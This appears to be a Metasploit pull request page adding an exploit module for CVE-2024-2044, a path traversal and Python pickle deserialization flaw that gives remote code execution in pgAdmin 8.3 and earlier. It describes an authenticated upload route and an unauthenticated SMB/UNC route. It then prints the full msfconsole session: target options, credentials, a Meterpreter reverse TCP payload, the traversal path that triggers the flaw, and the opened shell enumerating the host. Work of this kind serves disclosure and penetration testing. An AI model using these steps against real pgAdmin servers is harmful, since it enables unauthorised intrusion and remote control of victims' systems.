metasploit-framework
metasploit-framework copied to clipboard
rapid7
Add exploit for CVE-2024-2044 (pgAdmin <= 8.3 RCE)
This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request. I've added the source code for both the new one and the original as well to help future travelers tweak it as necessary.
Important notes from the exploit description:
This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound guest access be enabled.
Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin underwent changes in the 6.x versions and therefor, pgAdmin versions < 7.0 can not utilize the authenticated technique whereby a payload is uploaded.
This requires the changes from:
- rapid7/ruby_smb#264
Verification
- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do:
use exploit/multi/http/pgadmin_session_deserialization - [ ] Set the
RHOST,PAYLOAD, and optionally theUSERNAMEandPASSWORDoptions - [ ] Do:
run
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RHOSTS 192.168.250.134
RHOSTS => 192.168.250.134
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RPORT 8080
RPORT => 8080
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set USERNAME [email protected]
USERNAME => [email protected]
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > run
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Triggering deserialization for path: ../storage/user_gmail.com/eos.json
[*] Sending stage (24768 bytes) to 192.168.250.134
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:45930) at 2024-03-29 12:01:04 -0400
meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer : 27b165126272
OS : Linux 6.7.9-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Mar 6 19:35:04 UTC 2024
Architecture : x64
Meterpreter : python/linux
meterpreter > pwd
/pgadmin4
meterpreter >
